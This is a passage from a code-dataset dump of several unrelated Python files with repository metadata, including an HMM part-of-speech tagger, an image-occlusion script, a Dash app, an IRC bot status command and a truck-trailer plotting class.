275, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 270, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 277, "usage_type": "attribute"}, {"api_name": "eel.start", "line_number": 282, "usage_type": "call"}]} +{"seq_id": "36341769569", "text": "from abc import abstractmethod\nfrom collections import defaultdict\nfrom math import log, exp\nfrom sys import float_info\nfrom typing import AnyStr, List, Dict, Union, Type\n\nfrom dataset import START_TAG, END_TAG\nfrom probability import ProbabilityDistributionTable\n\n# This effectively acts as probability 0 in the form of log probability.\nmin_log_prob = -float_info.max\n\n\nclass POSTagger:\n def __init__(self, emission_matrix: ProbabilityDistributionTable, transition_matrix: ProbabilityDistributionTable):\n \"\"\"\n Constructor fo POS tagger class.\n :param emission_matrix: emission probability table\n :param transition_matrix: transition probability table\n \"\"\"\n self._emission_matrix = emission_matrix\n self._transition_matrix = transition_matrix\n\n @abstractmethod\n def get_tags(self, list_of_tokens: List[AnyStr], as_mapping: bool = False) -> Union[List[AnyStr], Dict[AnyStr,\n AnyStr]]:\n \"\"\"\n Get tags for a list of tokens\n :param list_of_tokens: list of tokens\n :param as_mapping: result should be returned as a list of pos tags or a mapping of tokens to pos tags\n \"\"\"\n raise NotImplemented()\n\n @classmethod\n def name(cls):\n \"\"\"\n Gets class name\n :return:\n \"\"\"\n return cls.__name__\n\n @staticmethod\n def as_mapping(list_of_tokens, list_of_tags):\n \"\"\"\n Returns list of tokens and list of tags as a list of paired tokens to tags\n :param list_of_tokens: list of tokens\n :param list_of_tags: list of pos tags\n :return:\n \"\"\"\n return dict((k, v) for k, v in zip(list_of_tokens, list_of_tags))\n\n def get_tagset(self):\n tagset = self._transition_matrix.get_unique_prior_tokens()\n # remove start and end tag from tagset\n if START_TAG in tagset:\n tagset.remove(START_TAG)\n if END_TAG in tagset:\n tagset.remove(END_TAG)\n return tagset\n\n\nclass EagerTagger(POSTagger):\n def _infer_tag(self, previous_tag, current_token) -> str:\n \"\"\"\n Infers the current tag (t_i) using the previous tag (t_i-1) and current token (w_i).\n :param previous_tag: previous tag\n :param current_token: current token\n :return: proposed tag\n \"\"\"\n # get all instances of t_i\n tagset_probabilities = []\n for tag in self.get_tagset():\n transition_prob = self._transition_matrix.infer(prior=previous_tag, target=tag)\n emission_prob = self._emission_matrix.infer(prior=tag, target=current_token)\n tagset_probabilities.append((tag, transition_prob * emission_prob))\n max_tag_prob_pair = max(tagset_probabilities, key=lambda v: v[1])\n return max_tag_prob_pair[0]\n\n def get_tags(self, list_of_tokens: List[AnyStr], as_mapping: bool = False) -> Union[List[AnyStr], Dict[AnyStr,\n AnyStr]]:\n \"\"\"\n Get tags for a list of tokens\n :param list_of_tokens: list of tokens\n :param as_mapping: result should be returned as a list of pos tags or a mapping of tokens to pos tags\n \"\"\"\n # gets tag from a sentence\n t_i = START_TAG\n predicted_tags = []\n for token in list_of_tokens:\n t_i = self._infer_tag(t_i, token)\n predicted_tags.append(t_i)\n if as_mapping:\n return self.as_mapping(list_of_tokens, predicted_tags)\n return predicted_tags\n\n\nclass ViterbiPOSTagger(POSTagger):\n def get_tags(self, list_of_tokens, as_mapping=False):\n \"\"\"\n Get tags for a list of tokens\n :param list_of_tokens: list 
of tokens\n :param as_mapping: result should be returned as a list of pos tags or a mapping of tokens to pos tags\n \"\"\"\n predicted_tags = list()\n # perform forward pass\n tagset = self.get_tagset()\n _, b_table = self._forward_track(tagset, list_of_tokens)\n # backtrack the b table to find your optimal set\n # find the tag for the highest end tag probability\n tracker = END_TAG\n for idx, v in reversed(b_table.items()):\n if len(v) == 1:\n key = list(v.keys())[0]\n predicted_tags.append(key)\n tracker = v[key]\n else:\n predicted_tags.append(tracker)\n tracker = v[tracker]\n if as_mapping:\n return self.as_mapping(list_of_tokens, predicted_tags[::-1][1:-1])\n return predicted_tags[::-1][1:-1]\n\n def _forward_track(self, tag_set, list_of_tokens, ):\n v_table = defaultdict(dict)\n b_table = defaultdict(dict)\n v_table[0] = {START_TAG: 1}\n b_table[0] = {START_TAG: START_TAG}\n for token_idx, token in enumerate(list_of_tokens):\n for tag in tag_set:\n if token_idx == 0:\n emission_prob = self._emission_matrix.infer(prior=tag, target=list_of_tokens[token_idx])\n transition_prob = self._transition_matrix.infer(prior=START_TAG, target=tag)\n max_v_tag_prob_pair = (tag, log(transition_prob) + log(emission_prob))\n\n else:\n trellis = []\n emission_prob = self._emission_matrix.infer(prior=tag, target=list_of_tokens[token_idx])\n for previous_tag in tag_set:\n transition_prob = self._transition_matrix.infer(prior=previous_tag, target=tag)\n previous_v = v_table[token_idx][previous_tag] # already in log\n trellis.append((previous_tag, log(transition_prob) + log(emission_prob) + previous_v))\n max_v_tag_prob_pair = max(trellis, key=lambda i: i[1])\n\n v_table[token_idx + 1][tag] = max_v_tag_prob_pair[1]\n b_table[token_idx + 1][tag] = (max_v_tag_prob_pair[0])\n # for the closing tag\n closing_trellis = [(t, log(self._transition_matrix.infer(prior=t, target=END_TAG))\n + v_table[len(list_of_tokens)][t]) for t in tag_set]\n max_v_tag_prob_pair = sorted(closing_trellis, key=lambda i: i[1])[-1]\n v_table[len(list_of_tokens) + 1] = {END_TAG: max_v_tag_prob_pair[1]}\n b_table[len(list_of_tokens) + 1] = {END_TAG: max_v_tag_prob_pair[0]}\n return v_table, b_table\n\n\nclass MostProbablePOSTagger(POSTagger):\n def get_tags(self, list_of_tokens, as_mapping=False):\n \"\"\"\n Get tags for a list of tokens\n :param list_of_tokens: list of tokens\n :param as_mapping: result should be returned as a list of pos tags or a mapping of tokens to pos tags\n \"\"\"\n predicted_tags = list()\n # perform forward pass\n tagset = self.get_tagset()\n alpha_table = self._forward_track(tagset, list_of_tokens)\n beta_table = self._backward_track(tagset, list_of_tokens)\n # alpha and beta table are the same size and confirmed that alpha[q_f] == beta[q_0]\n gamma_table = self._combine_table(alpha_table, beta_table)\n # get tags for the sentence\n for i in range(1, len(list_of_tokens) + 1):\n max_tag_prob_pair = sorted(gamma_table[i].items(), key=lambda v: v[1])[-1]\n predicted_tags.append(max_tag_prob_pair[0])\n if as_mapping:\n return self.as_mapping(list_of_tokens, predicted_tags)\n return predicted_tags\n\n def _forward_track(self, tag_set, list_of_tokens):\n \"\"\"\n Forward probability algorithm for generating alpha table\n :param tag_set: list of tags\n :param list_of_tokens: list of tokens\n :return: alpha table\n \"\"\"\n alpha_table = defaultdict(dict)\n alpha_table[0] = {START_TAG: 1}\n for token_idx, token in enumerate(list_of_tokens):\n for current_tag in tag_set:\n if token_idx == 0:\n emission_prob = 
self._emission_matrix.infer(prior=current_tag, target=token)\n transition_prob = self._transition_matrix.infer(prior=START_TAG, target=current_tag)\n log_alpha = log(emission_prob) + log(transition_prob)\n else:\n temp_alphas = []\n emission_prob = self._emission_matrix.infer(prior=current_tag, target=token)\n for previous_tag in tag_set:\n transition_prob = self._transition_matrix.infer(prior=previous_tag, target=current_tag)\n temp_alphas.append(\n log(emission_prob) + log(transition_prob) + alpha_table[token_idx][previous_tag])\n log_alpha = self.logsumexp(temp_alphas)\n alpha_table[token_idx + 1][current_tag] = log_alpha\n # do for closing tag\n alpha_table[len(list_of_tokens) + 1] = {\n END_TAG: self.logsumexp([log(self._transition_matrix.infer(prior=t, target=END_TAG))\n + alpha_table[len(list_of_tokens)][t] for t in tag_set])\n }\n\n return alpha_table\n\n def _backward_track(self, tag_set, list_of_tokens):\n \"\"\"\n Backward probability algorithm for generating beta table\n :param tag_set: list of tags\n :param list_of_tokens: list of tokens\n :return: beta table\n \"\"\"\n beta_table = defaultdict(dict)\n beta_table[len(list_of_tokens) + 1] = {END_TAG: 1}\n for token_idx, token in reversed(list(enumerate(list_of_tokens))):\n for current_tag in tag_set:\n if token_idx + 1 == len(list_of_tokens):\n log_beta = log(self._transition_matrix.infer(prior=current_tag, target=END_TAG))\n else:\n temp_betas = []\n for previous_tag in tag_set:\n emission_prob = self._emission_matrix.infer(prior=previous_tag,\n target=list_of_tokens[\n token_idx + 1]) # [token_idx + 1])\n transition_prob = self._transition_matrix.infer(prior=current_tag, target=previous_tag)\n temp_betas.append(\n log(emission_prob) + log(transition_prob) + beta_table[token_idx + 2][\n previous_tag]) # [token_idx + 1][previous_tag])\n log_beta = self.logsumexp(temp_betas)\n beta_table[token_idx + 1][current_tag] = log_beta\n # do for opening tag\n beta_table[0] = {\n START_TAG: self.logsumexp([log(self._transition_matrix.infer(prior=START_TAG, target=t))\n + log(self._emission_matrix.infer(t, list_of_tokens[0]))\n + beta_table[1][t] for t in tag_set])\n }\n return beta_table\n\n def _combine_table(self, alpha_table, beta_table):\n \"\"\"\n Joins alpha and beta table\n :param alpha_table: alpha table from forward probability algorithm\n :param beta_table: beta table from backward probability algorithm\n :return: gamma table where gamma[i][j] = alpha[i][j] * beta[i][j]\n \"\"\"\n gamma_table = dict()\n for step_key, alpha_step_dict in alpha_table.items():\n # multiply alpha and beta table elementwise\n gamma_step_dict = {}\n beta_step_dict = beta_table[step_key]\n for tag_key in alpha_step_dict.keys():\n # since both alpha and beta tables are in ln form. 
we just add them and take the exponent\n gamma_step_dict[tag_key] = exp(alpha_step_dict[tag_key] + beta_step_dict[tag_key])\n gamma_table[step_key] = gamma_step_dict\n return gamma_table\n\n @staticmethod\n def logsumexp(vals):\n \"\"\"\n Adding a list of probabilities represented as log probabilities.\n :param vals: log values\n :return: sum of log values\n \"\"\"\n\n if len(vals) == 0:\n return min_log_prob\n m = max(vals)\n if m == min_log_prob:\n return min_log_prob\n else:\n return m + log(sum([exp(val - m) for val in vals]))\n\n\ndef resolve_taggers(tagger_type) -> List[Type[POSTagger]]:\n taggers = []\n if tagger_type == \"eager\":\n taggers.append(EagerTagger)\n elif tagger_type == \"viterbi\":\n taggers.append(ViterbiPOSTagger)\n elif tagger_type == \"local_decoding\":\n taggers.append(MostProbablePOSTagger)\n elif tagger_type == \"all\":\n taggers.extend([EagerTagger, ViterbiPOSTagger, MostProbablePOSTagger]) # [EagerTagger, MostProbablePOSTagger]\n else:\n raise Exception(f\"Cannot resolve the tagger type [{tagger_type}]\")\n return taggers\n", "repo_name": "collinsikechukwu10/POSTagging-Algorithms", "sub_path": "tagger.py", "file_name": "tagger.py", "file_ext": "py", "file_size_in_byte": 13014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.float_info.max", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.float_info", "line_number": 11, "usage_type": "name"}, {"api_name": "probability.ProbabilityDistributionTable", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.AnyStr", "line_number": 25, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.AnyStr", "line_number": 26, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 55, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 56, "usage_type": "argument"}, {"api_name": "dataset.END_TAG", "line_number": 57, "usage_type": "name"}, {"api_name": "dataset.END_TAG", "line_number": 58, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.AnyStr", "line_number": 79, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.AnyStr", "line_number": 80, "usage_type": "name"}, {"api_name": "dataset.END_TAG", "line_number": 110, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 124, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 125, "usage_type": "call"}, {"api_name": "dataset.START_TAG", "line_number": 126, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 127, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 132, "usage_type": "name"}, {"api_name": "math.log", "line_number": 133, "usage_type": "call"}, {"api_name": "math.log", "line_number": 141, "usage_type": "call"}, {"api_name": "math.log", "line_number": 147, "usage_type": "call"}, {"api_name": "dataset.END_TAG", "line_number": 147, "usage_type": "name"}, {"api_name": "dataset.END_TAG", 
"line_number": 150, "usage_type": "name"}, {"api_name": "dataset.END_TAG", "line_number": 151, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 184, "usage_type": "call"}, {"api_name": "dataset.START_TAG", "line_number": 185, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 190, "usage_type": "name"}, {"api_name": "math.log", "line_number": 191, "usage_type": "call"}, {"api_name": "math.log", "line_number": 198, "usage_type": "call"}, {"api_name": "dataset.END_TAG", "line_number": 203, "usage_type": "name"}, {"api_name": "math.log", "line_number": 203, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 216, "usage_type": "call"}, {"api_name": "dataset.END_TAG", "line_number": 217, "usage_type": "name"}, {"api_name": "math.log", "line_number": 221, "usage_type": "call"}, {"api_name": "dataset.END_TAG", "line_number": 221, "usage_type": "name"}, {"api_name": "math.log", "line_number": 230, "usage_type": "call"}, {"api_name": "dataset.START_TAG", "line_number": 236, "usage_type": "name"}, {"api_name": "math.log", "line_number": 236, "usage_type": "call"}, {"api_name": "math.log", "line_number": 237, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 256, "usage_type": "call"}, {"api_name": "math.log", "line_number": 274, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 274, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 277, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 277, "usage_type": "name"}]} +{"seq_id": "31293833840", "text": "from PyQt5.QtWidgets import (\n QAction,\n QMainWindow,\n)\n\n\nclass MainWindow(QMainWindow):\n def setup(self, on_menu_item_tap):\n menuBar = self.menuBar()\n\n editMenu = menuBar.addMenu(\"&View\")\n\n self.request_view_action = QAction(\"Toggle request editor visibility\")\n self.request_view_action.triggered.connect(\n lambda: on_menu_item_tap(\"request_view\")\n )\n editMenu.addAction(self.request_view_action)\n\n self.templates_view_action = QAction(\"Toggle output view visibility\")\n self.templates_view_action.triggered.connect(\n lambda: on_menu_item_tap(\"output_view\")\n )\n self.setWindowTitle(\"curl2swift\")\n editMenu.addAction(self.templates_view_action)\n", "repo_name": "tomnvt/curl2swift", "sub_path": "curl2swift/layers/presentation/main_window.py", "file_name": "main_window.py", "file_ext": "py", "file_size_in_byte": 752, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 7, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 13, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "30058483706", "text": "import os,sys\nfrom PIL import Image, ImageDraw\nimport numpy as np\n\nimages_path = \"/datasets_nas/mapa3789/Pixel2Mesh/HandToolsRendered/ShapeNetHandTools_V13/\"\n\nsave_path = \"/datasets_nas/mapa3789/Pixel2Mesh/HandToolsRendered/ShapeNetHandTools_Occultation_Small\"\n\noccultation_factor = 5\n\n\ndef listFiles(dir, ext, ignoreExt=None):\n \"\"\"\n Return array of all files in dir ending in ext but not ignoreExt.\n \"\"\"\n matches = []\n for root, dirs, files in os.walk(dir):\n for f in files:\n if f.endswith(ext):\n if not ignoreExt or (ignoreExt and not f.endswith(ignoreExt)):\n matches.append(os.path.join(root, f))\n return matches\n\n\ndef draw_ellipse_on_img(im, radius, x_start, 
y_start):\n draw = ImageDraw.Draw(im)\n half_rad = radius / 2\n draw.ellipse((x_start - half_rad, y_start - half_rad, x_start + half_rad, y_start + half_rad), fill=0)\n\n\ndef calculate_bounding_box(im):\n return im.getbbox()\n\ndef calculate_mask_dimensions(bounding_box):\n pass\n\n\ndef get_pixels(im):\n pixels = list(im.getdata())\n width, height = im.size\n return [pixels[i * width:(i + 1) * width] for i in range(height)]\n\ndef get_image_object_pixels(pixel_list):\n image_pixels = np.asarray(pixel_list)\n image_pixels = np.sum(image_pixels, axis=2) # sum color + alpha together\n obj_pixels = image_pixels[image_pixels[:,:]!=0]\n return image_pixels, obj_pixels\n\ndef get_percentage_obj_img(image_pixels, object_pixels):\n return float(object_pixels.size) / float(image_pixels.size)\n\ndef calc_percentage_occultation(before_ratio, after_ratio):\n return 1 - (1 / (before_ratio + 1.e-8)) * after_ratio\n\ndef get_random_point_on_object(image_pixels):\n single_vector = np.reshape(image_pixels, (1,-1))[0]\n idx_nonzero, = np.nonzero(single_vector)\n random_pixel = np.random.choice(idx_nonzero)\n\n y = int(np.floor(random_pixel / image_pixels.shape[0]))\n x = random_pixel % image_pixels.shape[0]\n\n return x,y\n\ndef export_proportions(proportions):\n export = np.asarray(proportions)\n\n #add mean as column\n mean_percentage_cutout = export[1:,3].astype(np.float).mean()\n export = np.insert(export, 4, mean_percentage_cutout, axis=1)\n export[0][4] = 'mean percentage cutout'\n\n np.savetxt(os.path.join(save_path, \"proportions.csv\"), export, delimiter=\",\", fmt=\"%s\")\n np.savetxt(\"tmp/proportions.csv\", export, delimiter=\",\", fmt=\"%s\")\n print(\"FINISHED: mean percentage cutout: {}\".format(mean_percentage_cutout))\n print(\"RUN AGAIN WITH DIFFERENT RADIUS RATIO IF NOT SATISFIED\")\n\nproportions = [['Image file', 'object to image proportion (oip)', 'oip after masking', 'percentage cutout']]\nimages = listFiles(images_path, \".png\")\n\n\nimage_length = len(images)\nfor index, image in enumerate(images):\n\n print(\"{}/{}\".format(index+1, image_length))\n\n im = Image.open(image).convert(\"RGBA\")\n # bounding_box = im.getbbox()\n\n # replace this arbitrary number 5 with the amount you want to cut --> magic number\n # improvement: might have to adjust script, so it will always crop ~30% of the image\n # no time currently\n radius = max(im.size[0], im.size[1]) / occultation_factor\n\n #original image\n pixels = get_pixels(im)\n image_pixels, obj_pixels = get_image_object_pixels(pixels)\n obj_to_image_proportion_0 = get_percentage_obj_img(image_pixels, obj_pixels)\n\n try:\n x,y = get_random_point_on_object(image_pixels)\n except Exception:\n #we might not find a point on the object (happens if the whole image is transparent) -> should be deleted from training set\n print(\"ERROR: {} does not contain any information\".format(image))\n continue\n\n draw_ellipse_on_img(im, radius, x, y)\n\n #img with ellipse drawn on it\n pixels = get_pixels(im)\n image_pixels, obj_pixels = get_image_object_pixels(pixels)\n obj_to_image_proportion_1 = get_percentage_obj_img(image_pixels, obj_pixels)\n percentage_occultation = calc_percentage_occultation(obj_to_image_proportion_0, obj_to_image_proportion_1)\n\n proportions.append([image, obj_to_image_proportion_0, obj_to_image_proportion_1, percentage_occultation])\n\n # should be in form of mouse/3dw_378658fc-149c-4909-b924-e003a947c69b/rendering/10.png\n suffix = os.sep.join(image.split(os.sep)[-4:])\n img_path = os.path.join(save_path, suffix)\n if not 
os.path.exists(os.path.dirname(img_path)):\n os.makedirs(os.path.dirname(img_path))\n\n im.save(img_path,\"PNG\")\n\nexport_proportions(proportions)\n", "repo_name": "markuspaschi/ShapeNetTools", "sub_path": "DataSet_Tools/AddOcclusion/add_occlusion.py", "file_name": "add_occlusion.py", "file_ext": "py", "file_size_in_byte": 4471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.insert", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.savetxt", "line_number": 74, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 87, "usage_type": "name"}, {"api_name": "os.sep.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 120, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}]} +{"seq_id": "10181624478", "text": "#!/usr/bin/env python3\n\"\"\"\nDash Demonstration Project.\n\nCreate a graph and some fields to update the nodes.\n\"\"\"\n\nfrom graphtest.default_nodes import default_elements\nfrom graphtest.graph_viewer import GraphView\nfrom graphtest.inputs import Menu\n\n# Import the callbacks module so that the callbacks themselves be registered\nimport graphtest.callbacks\n\nfrom dash import Dash, html\n\n\nclass App:\n \"\"\"The Main Application.\"\"\"\n\n def __init__(\n self,\n elements: dict = default_elements,\n port: int = 8050,\n hostname: str = \"localhost\",\n ):\n \"\"\"\n Create the application.\n\n @param elements: Elements to populate the graph.\n @param port: Port the server should bind to\n @param hostname: Hostname the server should bind to\n \"\"\"\n self.app = Dash(__name__, title=\"Graph Visualisation 
App\")\n self.hostname = hostname\n self.port = port\n\n self.app.layout = html.Div(\n [\n GraphView(elements),\n html.Div(\n Menu(\n input_text=[\n \"Selected Node\",\n \"Property 1\",\n \"Property 2\",\n \"Property 3\",\n ],\n button_text=\"Update\",\n ),\n className=\"form-menu\",\n ),\n ],\n className=\"main-container\",\n )\n\n def run(self, debug=False):\n \"\"\"\n Run the server.\n\n @param debug: If true, Start server in debug mode\n \"\"\"\n self.app.run(debug=debug)\n\n def get_server(self):\n return self.app.server\n", "repo_name": "EmmanuelPauchard/graph-view", "sub_path": "graphtest/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "graphtest.default_nodes.default_elements", "line_number": 23, "usage_type": "name"}, {"api_name": "dash.Dash", "line_number": 34, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 38, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 38, "usage_type": "name"}, {"api_name": "graphtest.graph_viewer.GraphView", "line_number": 40, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 41, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 41, "usage_type": "name"}, {"api_name": "graphtest.inputs.Menu", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "43393432407", "text": "import urllib2\nimport json\n\ndef on_load(bot):\n bot.add_command('status', status)\n\ndef on_exit(bot):\n bot.del_command('status')\n\ndef status(bot, user, channel, args):\n if len(args) < 1:\n return\n\n shard = 'http://status.leagueoflegends.com/shards/'\n\n region = args[0].lower()\n\n full_url = shard + region\n\n response = urllib2.urlopen(full_url)\n\n json_response = response.read()\n\n incidents = json_response.count(\"content\") - 1\n\n readable_json = json.loads(json_response)\n\n try:\n content = str(readable_json['services'][1]['incidents'][0]['updates'][0]['content'].encode('utf8'))\n except:\n content = \"There are no reported issues at this time.\"\n\n content_replace = content.replace('\\r\\n', \"\")\n\n bot.send_msg(channel, \"%s Server Status: %s\" % (region.upper(), content_replace))\n", "repo_name": "devzspy/Brisingr", "sub_path": "mod_status.py", "file_name": "mod_status.py", "file_ext": "py", "file_size_in_byte": 836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib2.urlopen", "line_number": 20, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "17510435325", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n##################################################################################################################\n# Visualize_combination() #\n# #\n# This class initialises the visualisation of of a truck with a variable number of trailers #\n# Inputs: visualisation_shapes array provided by the method load_shapes(number_trailers) #\n# Outputs: _ #\n# Methods: run(visualisation_element) #\n# #\n# run(visualisation_element) #\n# This method is used to plot the combination consisting of a truck and possible trailers #\n# Inputs: visualisation_element array with the following 8 elements: #\n# #\n# truck_translation absolute translation of the truck #\n# truck_rotation absolute rotation of the truck, value in degrees #\n# first_trailer_rotation relative rotation of the first trailer to the truck, 
value in degrees #\n# second_trailer_rotation relative rotation of the second trailer to the first trailer, value in degrees #\n# steering_percentage steering angle of the truck, value between -1 and 1 #\n# destination_translation absolute translation of the destination #\n# destination_rotation absolute rotation of the destination, value in degrees #\n# number_trailers number of trailers, value between 0 and 2 #\n# Outputs: _ #\n##################################################################################################################\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\nfrom matplotlib import transforms\nimport numpy as np\n#from IPython import get_ipython\n#get_ipython().run_line_magic('matplotlib', 'qt')\n\n__author__ = \"Pär-Love Palm, Felix Steimle, Jakob Wadman, Veit Wörner\"\n__credits__ = [\"Pär-Love Palm\", \"Felix Steimle\", \"Jakob Wadman\", \"Veit Wörner\"]\n__license__ = \"GPL\"\n__version__ = \"0.9b\"\n__maintainer__ = \"Veit Wörner\"\n__email__ = \"veit@student.chalmers.se\"\n__status__ = \"Production\"\n\nclass Visualize_combination():\n def __init__(self,visualisation_shapes):\n \n self.yard_shape,\\\n self.drive_wheel_shape,\\\n self.hitch_radius,\\\n self.item_translations_truck,\\\n self.truck_shape,\\\n self.cab_shape,\\\n self.wheel_shape,\\\n self.rotation_center_truck,\\\n self.item_steering_rotations_truck,\\\n self.hitch_translation_truck,\\\n self.wheelbase_truck,\\\n self.maximal_steering_angle,\\\n self.item_translations_first_trailer,\\\n self.first_trailer_shape,\\\n self.shaft_shape,\\\n self.rotation_center_first_trailer,\\\n self.item_steering_rotations_first_trailer,\\\n self.hitch_translation_first_trailer_truck,\\\n self.hitch_translation_first_trailer_second_trailer,\\\n self.item_translations_second_trailer,\\\n self.second_trailer_shape,\\\n self.rotation_center_second_trailer,\\\n self.item_steering_rotations_second_trailer,\\\n self.hitch_translation_second_trailer,\\\n self.maximal_first_trailer_rotation,\\\n self.maximal_second_trailer_rotation,\\\n self.maximal_both_trailers_rotation= visualisation_shapes\n \n plt.ion()\n visualisation_figure = plt.figure(figsize=(10,10))\n self.ax = visualisation_figure.add_subplot(111, aspect='equal')\n self.ax.axes.get_xaxis().set_visible(False)\n self.ax.axes.get_yaxis().set_visible(False)\n plt.xlim(0, self.yard_shape[0])\n plt.ylim(0, self.yard_shape[1])\n plt.show()\n \n self.pause_time = 0.01\n\n def run(self,visualisation_element):\n \n for old_element in reversed(self.ax.patches):\n old_element.remove()\n \n truck_translation,\\\n truck_rotation,\\\n first_trailer_rotation,\\\n second_trailer_rotation,\\\n steering_percentage,\\\n destination_translation,\\\n destination_rotation,\\\n number_trailers = visualisation_element\n \n ## Destination plotting\n if number_trailers == 0:\n destination_rectangle = patches.Rectangle(-self.rotation_center_truck,\\\n self.truck_shape[0],\\\n self.truck_shape[1],\\\n color=\"red\",\\\n alpha=0.50)\n elif number_trailers == 2:\n destination_rectangle = patches.Rectangle(-self.rotation_center_second_trailer,\\\n self.second_trailer_shape[0],\\\n self.second_trailer_shape[1],\\\n color=\"red\",\\\n alpha=0.50)\n else:\n destination_rectangle = patches.Rectangle(-self.rotation_center_first_trailer,\\\n self.first_trailer_shape[0],\\\n self.first_trailer_shape[1],\\\n color=\"red\",\\\n alpha=0.50)\n \n rotation_destination = transforms.Affine2D().rotate_deg(destination_rotation)\n translation_destination = 
transforms.Affine2D().translate(destination_translation[0],\\\n destination_translation[1])\n destination_transformation = rotation_destination\\\n +translation_destination\\\n +self.ax.transData\n destination_rectangle.set_transform(destination_transformation)\n self.ax.add_patch(destination_rectangle)\n \n ## Truck plotting\n wheel_rectangles = []\n truck_everything = []\n truck_rectangle = patches.Rectangle(-self.rotation_center_truck,\\\n self.truck_shape[0],\\\n self.truck_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\n cab_rectangle = patches.Rectangle(-self.cab_shape/2,\\\n self.cab_shape[0],\\\n self.cab_shape[1],\\\n color=\"green\",\\\n alpha=0.50)\n drive_wheel_rectangles = [patches.Rectangle(-self.drive_wheel_shape/2,\\\n self.drive_wheel_shape[0],\\\n self.drive_wheel_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\\\n for drive_wheel_number in range(2)]\n wheel_rectangles = [patches.Rectangle(-self.wheel_shape/2,\\\n self.wheel_shape[0],\\\n self.wheel_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\\\n for wheel_number in range(5)]\n hitch_circle = patches.Circle((0, 0),\\\n self.hitch_radius,\\\n color=\"black\",\\\n alpha=0.50)\n truck_everything = [truck_rectangle]\\\n 